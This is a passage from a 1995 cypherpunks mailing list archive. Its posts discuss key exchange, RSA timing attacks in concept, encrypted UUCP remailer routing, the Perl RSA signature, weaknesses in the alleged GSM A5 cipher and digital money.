Qrn30sKgxETMS+BfTa91dWyT0W9w6uudYubQqZU4MLthhUHT9kq6VuE1PCmTvHUl
cAf2Ku+QhFE=
=CySl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 12 Dec 95 20:14:06 PST
To: cypherpunks@toad.com
Subject: Re: The Elevator Problem
Message-ID: <199512130413.XAA04532@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


OK. I'll bite. I realize that whenever non-heavy crypto people tackle heavy
crypto problems, the answers are virtually always: (a) obviously wrong; (b)
proposed 400 years ago; (c) not even related to the original question; (d)
all of the above. 
 
Alice says to Bob, in front of all of the other people on the elevator: "I
have generated a large(ish) amount of large(ish) prime numbers and have
recorded all of them. I have multipled two of the numbers to get an even
larger non-prime number. I have done this a large(ish) number of times
until I have a 'large(ish)/2' set of non-prime numbers. The elements of
this set are [Alice reads off the set of non-prime numbers and Bob along
with the other people on the elevator record them.] Bob, go home and pick
one of the non-prime numbers in the set. Factor it. Use the largest prime
as a private key in your message to me. Since I know what the numbers all
are, I'll try all of them to see which one decrypts your message." 
 
Bob has to factor one large(ish) prime. 
 
Alice has to *try* an average of "large(ish)/2" private keys to decrypt
Bob's message. 
 
The other people on the elevator have to *factor* an average of
"large(ish)/2/2" number of large(ish) numbers to decrypt the message. 
 
The *relative* security then depends on the number of digits in the
large(ish) primes and the number of products in the set Alice reads to Bob.

 
E.G. 
 
Imagine that Alice previously generates 2,000,000 prime numbers, giving her
a set of 1,000,000 products. Neither Bob nor anyone else on the elevator
knows the 2,000,000 primes that Alice has generated. She reads all
1,000,000 products to Bob and everyone else on the elevator. 
 
Imagine that any given product can be factored in 100 MIP days (i.e. a 100
MHz Pentium running for 24 hours or "P-Day"). 
 
Bob factors one and only one of the numbers and uses the factor as a
private key to generate the message. 
 
Neither Alice nor anyone else on the elevator knows what product Bob picked
to factor. 
 
Alice receives the message. She takes the 2,000,000 privately recorded
primes and runs a brute force attack on the encrypted message, decrypting
it in an average of 1,000,000 tries. 
 
The other people on the elevator need to factor each number and then run it
has a brute force attempt to decrypt the message. This takes them an
average of 500,000 P-Days to factor the numbers plus whatever the brute
force time requires. 
 
The relative security develops because it is faster to generate large(ish)
primes and to brute force decryption then to factor the large(ish) primes.
The absolute time it takes to generate the primes and to brute force the
decryption sets the relative time Alice is willing to spend to get a
different relative level of security. If the nasties are the NSA, then
500,000 P-Days is too insecure. If the nasties are Alice and Bob's nosey
neighbor, then 500,000 P-Days is "excessively" secure. If Alice and Bob are
sweet patooties, and the nasty is Alice's father who runs the comp sci
department at the university, then 500,000 P-Days is about right. 
 
Now, if any of you want to waste some time, you can play "kick the newbie"
re points (a) through (d) above. 
 
--tallpaul 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@mail.mpx.com.au (lyal collins)
Date: Tue, 12 Dec 95 16:45:02 PST
To: cypherpunks@toad.com
Subject: Timing RSA and Certificates worth ??
Message-ID: <m0tPfIw-0006O8C@kyoko.mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain


My limited mind induces me to think that a certificate become subject to
timing attacks on the RSA private signing key.
This appears to meet the main critieria of fixed data (for instance, a
bank's certificate in/on ecash), processed widely by a small group of
machines (eg a subset of customers) on inherently untrusted machines (home
PC's) which may or may not have the right software/operating system parts.
Certificates in general, do not appear to lend themselves to "blinding".

In this case, certificate verification  processes seem flawed and highly
unreliable.
eg a merchant gets lots of data containing a bank(s) certificate, and
probably encrypted data. 
Is this the death knell for STT/SEPP and ecash/echeque systems ???

Some ramblings and thoughts.
lyal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 14 Dec 95 00:29:00 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem (a.k.a. build a private key in public)
In-Reply-To: <9512130511.AA25229@all.net>
Message-ID: <199512140828.DAA19405@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Alice: tell Bob your public key
> Bob: use Alice's public key to encrypt a random number and tell it to everyone
> 
> Now: start communicating using the random number as a private key.

It's far from clear that this is a patent-free solution.

-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robichaux, Paul E" <perobich@ingr.com>
Date: Fri, 15 Dec 95 07:10:23 PST
To: "'cypherpunks@toad.com>
Subject: RE: ADDRESS DATABASE?
Message-ID: <c=US%a=_%p=INTERGRAPH%l=EXCH7951215090736LB00D406@exch11>
MIME-Version: 1.0
Content-Type: text/plain


>Another "best way" is to make all calls that you want to be personal with
>a cellular phone.  Most cellular systems don't send ANI and do not provide
>any type of billing information to the phone company.  The number is also 
by
>nature unlisted and the only way to get it is by you or the cellular
>carrier.  If the cellular carrier gives your number out without your
>permision or a court order they are in BIG trouble..

Not. As of 12/1/95, the FCC requires all cellular carriers (and IXCs for 
that matter) to transmit ANI & CLID information, even on cellular calls. 
BellSouth thoughtfully put a notice in my last two monthly bills, but then 
again I think the FCC required that too.

-Paul

--
Paul Robichaux, KD4JZG | perobich@ingr.com
Intergraph Corporation   | http://www.intergraph.com
Be a cryptography user.  | Not speaking for Intergraph
Co-author, "Building Internet Appls With Visual C++", Que Books 
(0-7897-0213-4)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 15 Dec 95 11:01:53 PST
To: cypherpunks@toad.com
Subject: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Message-ID: <199512151900.LAA15457@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Dec 1995, Alice de 'nonymous wrote:

> Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000
> from Netscape for finding the HUGE security flaws in Netscape's existing 
> product line??
>
> Alice de 'nonymous ...               <an455120@anon.penet.fi>
                                       ^^^^^^^^^^^^^^^^^^^^^^^^

Heh, hey Alice, you know this discussion a short time ago where you
claimed that you wouldn't use PGP for signing because it wasn't secure
or something, what's with the use of the penet address?

Surely a penet address offers even less protection for your id?

Or have you done something nifty like create the penet address with a
nymserver address?

(the real)

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNHFeIbu8OQjKS7RAQFsmAP/SKKz7XCVmTxUQhLL+IEQaleMaTgp+rCO
GAsCDcESY6DBDd3NLR07fkNxZufGxyTFqOeL8SFlH5fMGYvwuLrytLwc9guqkr5I
aAXiq+hz13GHhoCkr0SnK+ti1M8ERj8EwTvyUWHnUy4b3Nb4K8oD0OzgZwcHVMkP
jvdsCUnQQfo=
=z2td
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Ziegast <ziegast@va.pubnix.com>
Date: Fri, 15 Dec 95 08:55:21 PST
To: dlv@bwalk.dm.com
Subject: Obfuscating traffic flow (Re: : Pornographic stories)
In-Reply-To: <Dgo5FD5w165w@bwalk.dm.com>
Message-ID: <LAA13661.199512151654@pub01.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


>>   So:
>>           What is the "real" reason for opposition to     
>>           strong crypto?  Who "really" benefits?  (and please
>>           don't mention the LE types 'cause I don't believe it).

A company may not want their employees to use crypto because they
want to be able to monitor their traffic.  When a company becomes
paranoid about trade secret protecion or corperate espionage,
worker's privacy is one of the first things to go.  It's the
company' choice though.  They may or may not know the legal can of
worms they'd be opening.

I can understand why LE types might be against strong crypto traffic,
but I'm not allowed to mention them here. ;^)

I would think that ISPs (and even commercial online services) would
prefer that their customers use strong crypto because it's less for
them to worry about ("Are they really sending pornography or death
threats though our network?").

The current protection for some service providers (at least the ones
with Internet-savvy lawyers) is primarlily contractual.  They have
their users agree to service agreements before their users allowed
to use their service.  Search your ISP service agreement for phrases
like ("customer holds harmless and indemnifies Company" or "does not
monitor traffic in any way" or "not responsible for data transmitted").

>>   and:
>>           Anyone else want to participate in the great '90's
>>           uucp revival?  I'm in Santa Clara and could use
>>           some feeds and some help with the setup.
>
> I'm all for it. My site is connected to the rest of the world via dial-up
> UUCP, I haven't touched the setup in 5 years, and am not planning to.
> 
> It might be interesting to have a variation of dial-up UUCP where site 1
> passes encrypted stuff to site 2 and doesn't quite know what site 3 they're
> supposed to go on to. Sort of like the remailers with encryption.

Mail flow obfuscation...

UUCP is only a store-and-forward transport mechanism.  The functionality
you're looking for just depends on the command you execute on the far
end.  People currently use something similar to:

	uux -p -r -z site1!rmail site2!sites3!user
     or
	uux -p -r -z site1!rmail site3!user	(if it's known that site1
						 can figure out how forward
						 mail to site3)

You'd basically be looking for another type of remailer that decrypts
a message to find out how to send it along tothe next hop.

On the sender's system, one could:

	cat message \
		| pgp -feast user \
		| encapsulate site3 \
		| encapsulate site2 \
		| encapsulate site1 \
		| uux -p -r -z site1!decap_remail

At site1, decap_remail would look into the message, decrypt it,
and know to forward it to site2...

	cat message \
		| uux -p -r -z site2!decap_remail

When it forwards the message, and information about where it got the
message from would be stripped (i.e. strip "Received:" or "From "
information it forwarded).  Bounces go to /dev/null.  The removal
of return path informaiton is the most important part of this
process.

At site2, we decrypt and forward to site3:

	cat message \
		| uux -p -r -z site3!decap_remail

At site3, we decrypt and find no message to forward, so it gets
sent to the local mailer for the user (message still encrypted).

Pros: At any point during the transmission, a site only knows the
      previous hop, and the next hop, and the rest is garbage.

      The message is encrypted throughout delivery in such a way
      that to trace a message, you need cooperation from all
      system administrators along the way (use long hop paths
      for more security!).

Cons: Debugging message routing problems is nearly impossible.
      One could possibly get around this by having the recipient
      confirm that the message was received.

      CPU utilization on the mailers would be more than the
      normal bit-shuffling.

      The sender needs to know the explicit path to get from point
      A to point X, to point Y, to point Z.  Either the user has
      to have key exchanges with each mailer down the path, or a
      public key system (can you say "UUCP maps"?) needs to exist
      so that any user withtl the maps can encrypt for any other
      mailer out there.

To optimize the process, one would only encrypt the envelope
information and leave the message intact (leaving it to the
user to encrypt).

Note: You don't need UUCP for this.  Any smart mailer like Sendmail
      or Smail can be configured for something like this.  You
      just need 10-20 sites in the Internet willing to provide this
      remailing service (for example, anon.penet.fi might be one.
      The goal is to make it administratively hard for people to
      compute traffic flow.  One would still use end-end encryption
      to protect message content.

--
Eric Ziegast

PS:  I don't read cypherpunks.  Someone forwarded this to me because
     they thought I'd be interested in the "UUCP" aspect.  If you
     respond and want me in on the discussion, feel free to CC: me.

PPS: Disclaimer: I'm not a crypto newbie.  Don't assume I know what
     I'm talking about.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 15 Dec 95 16:18:52 PST
To: Anonymous <nobody@replay.com>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <199512151901.UAA10562@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951215154703.12878C-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 15 Dec 1995, Anonymous wrote:

>      It's kind of cool how much faith you have in the idea that
> your number is unlisted, considering the fact that you started
> this thread by griping that someone had the goods on you. The
> reason you were "taken aback" is because your beliefs don't
> correspond to reality -- "cognitive dissonance," in the lingo.

1) I have no faith in my number being unlisted, I merely 
   mentioned my contractural expectation.

2) I was not griping.  I was requesting information (of which
   "Anonymous" is apparently bereft).

3) Being "taken aback" refers to surprise (look it up).  Far
   from the meaning of "cognitive dissonance."

"Assuming facts not in evidence," in the lingo.

So what DO you know, "Anonyomous"?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 16 Dec 95 06:32:16 PST
To: cypherpunks@toad.com
Subject: Re: e$: Seven Days
Message-ID: <v02120d0cacf887cdad9a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:36 AM 12/16/95, Timothy C. May wrote:

>By the way, in honor of the "geodesic network" and "geodesic payment
>systems," and the geodesic dome the party was in, I propose we rename "e$"
>with a more fitting name: "buckybucks." Or just "buckys" for short. ("Did
>you remember to replenish the buckybits?")

Snoop Bucky Bucks?

Sounds like a Cyberdog part to me...

<ducking many tomatoes>

Maybe not...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dsmith@midwest.net>
Date: Sun, 17 Dec 95 18:43:47 PST
To: cypherpunks@toad.com
Subject: Re: Motorola Secure Phone
Message-ID: <199512180304.VAA12327@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:34 PM 12/15/95 -0800, you wrote:

>	My AT&T 900 (or is it 9000?) MHz digital cordless phone says
>the same thing. I figure it uses a weak cryptosystem. There is
>something about key setup when you return the handset to the base.
>	(The phone was $200, FWIW)

That just refers to the fact that it is no longer legal to sell
scanners that can listen in to that range.  The same is true
of the 800 MHz band (used for a lot of cellular phone traffic).
Ah, I love my really old scanner that isn't bound by such
limitations...  (BTW, a couple of years ago Nuts & Volts ran
an article with information on a program and some toys that let
a laptop computer, properly wired into a cell phone, act as a
cell scanner.  Never did wire it up, but it looked like fun ;)

ObCrypto: um, if you can find it, let me know :)


----- David E. Smith, c/o Southeast Missouri State University
1210 Towers South, Cape Girardeau MO USA 63701-4745, +1(573)339-3814
PGP ID 0x92732139, homepage http://www.midwest.net/scribers/dsmith/
Dec15-Jan15: (618)244-3340/2209 Perkins, Mt Vernon IL 62864Quote: "If I wanted thrills and danger and lots of rampant violence,
I coulda been a postal worker!"  -- Ben, "Sensational Spider-Man"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard D. Sheffar" <rick@muskoka.net>
Date: Sun, 17 Dec 95 19:17:32 PST
To: aba@atlas.ex.ac.uk
Subject: Re: BIO-MUNITION: gifs of perl-RSA tattoo
In-Reply-To: <730.9512122013@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.BSD/.3.91.951217221057.9112A-100000@segwun.muskoka.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 12 Dec 1995 aba@atlas.ex.ac.uk wrote:

> 
> People have been reading the list for a while will be familiar with
> this piece of perl code used as a non-exportable, supposedly ITAR
> controlled .sig:
> 
> 
> #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
> $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
> 2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
> pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
> 
Okay, I admit it I don't know everything.
What does the perl script actually do.
I saved to file, chmod 777 perly
tried running the script and kept getting error line 3.
What does it do, does it encrypt a file or what. What Have i done wrong?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: PGP Signed with PineSign 2.2

iQBVAgUBMNTcedZnjIiISvIVAQF7IwH7BufPIuyXuJy6LJOsUnxJYIzv7GAly4FL
OWL8xHaKZb/7Ltepmeyd988TM+3DAmIDzEW2EdX5Nwia8Scst3TnoA==
=/gW7
-----END PGP SIGNATURE-----
 
Please report any Strange behaviour by the Mail Monster to rick@muskoka.net
****************************************************************************** 
send mail w/ subject 'send help', To get Commands accepted by Mail Monster.  
rick@muskoka.net   rick.sheffar@primetime.org  
PGP encrypted mail accepted and preferred!     
PGP key ID  0x884af215
PGP key finger print = 01 49 EA C6 42 90 21 02  9D CB 19 7E E3 23 66 58
******************************************************************************
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 17 Dec 95 14:24:52 PST
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: BosniaLINK (and other unnecessary posts)
In-Reply-To: <199512171340.OAA14680@utopia.hacktic.nl>
Message-ID: <Pine.BSD.3.91.951217220655.14110B-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



attila sez:

    it seems unreasonable to stifle all of the associated political 
posturing and infomercials from our "only natural criminal class" [Mark 
Twain], but I took 10 days of the full list and ran it through some of 
text processing and retrieval routines --80% of the characters delivered 
contain _only_ policy arguments, and another 10% are more or less off the 
mark.  

    No one has time to monitor (moderate) the list to reduce this load
--are we ready to turn that job over to hardwire analysis? [I see little 
value in AI in this case, but I'm sure some will disagree <g>.]

    Let's put it this way: if we were a radio or television station, 
they'd pull the plug for our static or white snow....

    procmail gets rid of Dr. Fred, or even the mention of Dr. Fred, but is
not intelligent enough to sort for the presence of key words from either
side of the fence (you must pass it if there are technical references even
though Bubbha appears in the text). 

   I have more than adequate text retrieval and text syntactic routines 
--is that where we are headed?

On Sun, 17 Dec 1995, Anonymous wrote:

> 
> URL: http://www.dtic.dla.mil/bosnia/
> 
>    BosniaLINK Banner
>    
>    Welcome to BosniaLINK, the official Department of Defense 
> information
>    system about U.S. military activities in Operation JOINT 
> ENDEAVOR, the
>    NATO peacekeeping mission in Bosnia. This system is provided 
> by the
>    Office of the Assistant to the Secretary of Defense for 
> Public
>    Affairs. All information in BosniaLINK is publicly released
>    information from the U.S. government or NATO headquarters.
>    
>    BosniaLINK contains operation maps, fact sheets, news 
> releases,
>    biographies of key commanders and leaders, and transcripts 
> of
>    briefings, speeches and testimony. It is also hyperlinked to 
> the NATO
>    and State Department information services.
>    
>    
>      
> _________________________________________________________________
> 
>    
> Contents
> 
>      * Maps (Dec 8)
>      * Fact Sheets (Dec 12)
>      * News Releases (Dec 15)
>      * Photos (Dec 15)
>      * Biographies of Key Commanders and Leaders (Dec 15)
>      * Transcripts of Briefings (Dec 15)
>      * Speeches and Testimony (Dec 15)
>        
>    
>      
> _________________________________________________________________
> 
>    
>    
>    
>   RELATED SITES FOR BOSNIA INFORMATION
>   
>    Air Force Role in Bosnia
>    NATO
>    U.S. State Department: U.S. Policy on Bosnia
>    Navy News Service: Bosnia Operations
>    
>    
>    
>      
> _________________________________________________________________
> 
>    
>    BosniaLINK is provided through the cooperative efforts of 
> the Office
>    of The Assistant to the Secretary of Defense (Public 
> Affairs), and the
>    Defense Technical Information Center. This is a government 
> computer
>    system.
>    
>    
>      
> _________________________________________________________________
> 
>    
>    DefenseLINK Home
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Sun, 17 Dec 95 14:33:43 PST
To: Tatu Ylonen <ylo@cs.hut.fi>
Subject: Re: Motorola Secure Phone
In-Reply-To: <199512171141.NAA02997@trance.olari.clinet.fi>
Message-ID: <E0tRRco-0003nh-00@bescot.cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I got the following from mjos@math.jyu.fi a couple of months ago.
> Unfortunately I was unable to attend or listen on mbone.  Does anyone
> know more about this?

Yes -- we have analogue A/V on a VHS cassette, digital MBone recording on M/O,
and an abstract ... see below.

>>                  University of Cambridge Computer Laboratory
>>                                SEMINAR SERIES
>> 10th October    Bill Chambers, King's College, London
>>                PROBLEMS OF STREAM CIPHER GENERATORS WITH MUTUAL CLOCK CONTROL
>> GSM:n salausalgoritmi on juuri tuota tyyppi. Chambers yritti pit tuota
>> nimenomaista esitelm jo yli vuosi sitten, mutta silloin viralliset tahot
>> puuttuivat asiaan ja esitys peruttiin. Hn on lytnyt algoritmista aukkoja,
>> joiden avulla purkuaika saadaan erittin lyhyeksi.
>> ps. ne meist, jotka psevt mboneen ksiksi, voivat seurata tapahtumia
>>     liven  :)
> [Free translation: The GSM encryption algorithm is of exactly that
> type.  Chambers tried to have this particular presentation over an
> year ago, but at that time the official side interfered and the
> presentation was cancelled.  He has found holes in the algorithm that
> can be used to make decryption (without key) very quick.
> PS.  Those of us who can get access to mbone, can follow it live.]

<TITLE>Security Group Seminar, 10th October 1995</TITLE>
<H1>Security Group Seminar, 10th October 1995</H1>

  <HR>
  <DL>
    <DT>Speaker:
      <DD>Bill Chambers, King's College, University of London<P>

    <DT>Date:
      <DD>Tuesday 10th October<P>

    <DT>Place:
      <DD>Room TP4, Computer Laboratory<P>

    <DT>Title:
      <DD>PROBLEMS OF STREAM CIPHER GENERATORS WITH MUTUAL CLOCK CONTROL<P>
  </DL>

    The speaker has been looking at the cycle structure of an algorithm
    posted just over a year ago on the Internet and alleged to be the
    secret A5 algorithm used for confidentiality in the GSM mobile
    telephone system. This algorithm employs three mutually
    clock-controlled shift registers, and can fairly quickly enter a
    loop with what is essentially the shortest possible period, a
    number very small compared with the total number of states, or even
    its square root. Moreover this behaviour is robust, not being
    influenced by factors such as choice of primitive feedback
    polynomial or even clocking logic (with a proviso to be
    discussed).  A fairly straightforward explanation for this
    behaviour has been found. Some ways of getting around the problem
    of excessively short periods are considered, as well as the
    behaviour of systems with different numbers of mutually clocked
    registers. In particular a mention is made of the wartime T52e
    cipher, perhaps the inspiration for "alleged A5".<P>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Dec 95 05:54:49 PST
To: cypherpunks@toad.com
Subject: GLO_bul
Message-ID: <199512181354.IAA29000@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-18-95. NYPaper:


   "His Goal: Keeping the Web Worldwide."

      An adoration of selfless Tim Berners-Lee with a 
      pan gloss of the World Wide Web Cartel.


   "From Mainframes to Global Networking."

      I.B.M.'s selfless strategy for Net supremacy, 
      hand-in-hand with altruistic AT&T and eleemosynary 
      Microsoft.


   GLO_bul  (17kb)













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 19 Dec 95 19:02:36 PST
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Is ths legal?...
In-Reply-To: <skp7EKS00YUvAEUFUm@andrew.cmu.edu>
Message-ID: <9512182021.AA23246@krypton.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



>    The answer to the "is this legal?" question is more complex than 
> simply "private versus public" university.  There are fairly strict 
> federal anti-wiretapping laws.  It is hardly clear that a private 
> university may eavesdrop on students' phone or computer conversations, 
> even if conducted over the university's network.  Furthermore, many 
> states have their own anti-wiretap and anti-eavesdrop laws, which are 
> even stricter than federal standards.  I don't have the time nor the 
> inclination to do research into Oklahoma law, but we did some research 
> into this area of state and federal law for the LaMacchia case and 
> concluded that in its investigation of David LaMacchia, MIT very well 
> might have violated federal laws.

It is definitely legal for private entities to have strict control over
their own resources.  In particular, it is legal for a company to listen
in on their phone conversations for quality control purposes if they
announce this fact ahead of time (you may have heard such a disclaimer
when you call tech support, for instance).

Also, if a student signs such a waiver acknowledging that the situation
at this school is not necessarily that of the "norm" or of potentially
overriding state or federal law, there is a good chance the student has
signed away their right/priviledge of absolute privacy.  Unless there
is serious violation of Constitutional rights or if the contract is
constructed or negotiated in bad faith or in some illegal manner, the
old saying applies:  "a contract is a contract".

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Mon, 18 Dec 95 20:02:48 PST
To: cypherpunks@toad.com
Subject: Java and timing info - second attempt
Message-ID: <9512190402.AA12992@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



I asked about using Java scripts to capture remote timing info before and  
got no response.  I assume everyone thought it was a stupid question.   
Therefore, I'll ask it again.

The thing that makes Java a big deal is that you execute other people's  
code on your machine.  You browse a Java-enhanced Web page, click on  
something interesting, suck across an applet, and execute it on your  
machine.  This setup enables a bunch of nifty interactive Web stuff.

Turn the picture around:  You setup a Java-enhanced Web page, include some  
interesting buttons to click, write some clever applet, and people around  
the world suck your applet onto their machine and execute it.

Combine this with some a standard crypto API for doing Web-based digital  
signatures or authentication or encryption and you may begin to see some  
possibilities.

Would it be possible to create a Java applet that causes the client  
machine to sign or encrypt something with their private key, and then send  
back timing info?

For the answer to be YES a few things need to be true.  There needs to be  
some sort of standard crypto API in use that can be accessed by a Java  
script, and Java scripts need to be able to capture and send back timing  
info.  Does anyone on this list know enough about Java to know if it can  
do any of these things?

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 19 Dec 95 07:58:08 PST
To: cypherpunks@toad.com
Subject: Re: (fwd) Economics of Digital Money.
Message-ID: <199512191557.HAA20962@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


> But electronic checking it is a substitute for 
> conventional checking, it would just increase the 
> speed of the transaction.  From the economic standpoint,
> there is no difference in the dynamics of the checking 
> process from normal checks

And email is no different from mail, right?

Wrong:  When computer programs start spending money and receiving
money on behalf of their masters, we will see vast economic
changes.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wwwziff@internet.com (ZD Net / World Wide Web Edition)
Date: Tue, 19 Dec 95 06:04:36 PST
To: wwwedition@ziff.com
Subject: ZD Net Update v.1 #4
Message-ID: <199512191404.JAA25130@yipee.internet.com>
MIME-Version: 1.0
Content-Type: text/plain


______________________ZD Net Update_______________________ 
v. 1 #4                                           12-11-95

Welcome to ZD Net Update, the free E-mail newsletter created 
especially for registered users of Ziff-Davis Interactive's ZD 
Net/World Wide Web Edition. ZD Net Update is a bi-weekly bulletin 
that alerts you to new and exciting developments on ZD Net.

In this issue:

> YAHOO, ZIFF-DAVIS ANNOUNCE PLAN TO JOIN FORCES 
> PC MAGAZINE UNWRAPS ITS 1995 HOLIDAY GIFT GUIDE 
> COMPUTING TRAILBLAZER HELPS YOU "BUY IT ONLINE"  

*     *     *     *     *     *     *     *     *     *

YAHOO, ZIFF-DAVIS ANNOUNCE PLAN TO JOIN FORCES

On Tuesday, December 12, Yahoo Corp. and Ziff-Davis Publishing Co. 
announced a strategic relationship that establishes a new, Web-
driven publishing model for delivering content via print, online, 
and CD ROM. The relationship leverages the expertise and brand names 
of Yahoo, operator of the leading directory on the Web, and Ziff-
Davis, the leading publisher of computer magazines and computing 
content online, including ZD Net. 

The new alliance is initially focused on two media products: Yahoo 
Internet Life and ZD/Yahoo Computing. Yahoo Internet Life is an 
interactive magazine based on one of the most popular sites on the 
World Wide Web. ZD/Yahoo Computing seeks to become the ultimate 
value-added, online directory of computing resources on the Web.

Yahoo Internet Life combines a Web site, a print publication, and a 
CD ROM. Each issue of the quarterly magazine will include a CD ROM 
that contains virtually everything in the magazine as well as the 
software that users need to connect to the Web. The print version of 
Yahoo Internet Life will debut on newsstands in February 1996. 

Bill Machrone, Editor-in-Chief of ZD Internet Life and Ziff-Davis's 
Vice President of Technology, was named Editor-in-Chief of Yahoo 
Internet Life.

ZD/Yahoo Computing will be the definitive online guide to finding 
and using computing resources on the Web. It will incorporate an 
enhanced version of The Computing Trailblazer, a popular feature of 
the ZD Net Web site that reviews computing sites on the Internet, as 
well as new features to help people find computing products, 
companies, and services. ZD/Yahoo Computing will be available in 
early 1996.

For more information about the announcement, including a Shockwave 
file and VDOLive video clips, check out the ZD Public Relations site 
at:
 http://www.zdnet.com/pr/


*     *     *     *     *     *     *     *     *     *

PC MAGAZINE UNWRAPS ITS 1995 HOLIDAY GIFT GUIDE

The holidays are fast approaching, you're faced with tons of folks
who need gifts, and you have no idea what to buy them. How to get in 
the holiday spirit? Don't despair. Your shopping list may be long, 
but PC Magazine's list of gift ideas is bound to be longer.

The editors at PC Magazine have gathered 101 of the best educational 
and entertainment products to hit the shelves since last holiday 
season. Nearly all of these products are Windows-based, except for 
the games, most of which run under DOS. 

For the youngest folks on your list, the Kids' Software section 
includes a selection of learning games covering all the basic 
subject areas, many of which star characters the kids will 
recognize. For those hard-to-please gamers, this holiday offers an 
abundance of riches in all categories: action and adventure games, 
arcade games and puzzles, strategy and  simulation games, and sports 
games. 

Looking for something a bit less frivolous? Then check out the 
reference offerings and the selection of personal productivity 
software. For gadget lovers, there's a fun and funky array of PC 
peripherals that would look great on any desktop. And don't miss the 
list of 10 great gifts under $35. 

So forget about fretting over that holiday shopping list. PC 
Magazine gives you 101 reasons to celebrate this holiday season. 
Discover a little holiday cheer at:

 http://www.zdnet.com/~pcmag/issues/1422/pcm00154.htm


*     *     *     *     *     *     *     *     *     *

COMPUTING TRAILBLAZER HELPS YOU "BUY IT ONLINE"

Looking for an easier way to get your hands on the latest hardware 
and software? Why not go online?

Introducing "Buy It Online," the newest category in The Computing 
Trailblazer, Ziff-Davis's guide to computing resources on the Web. 
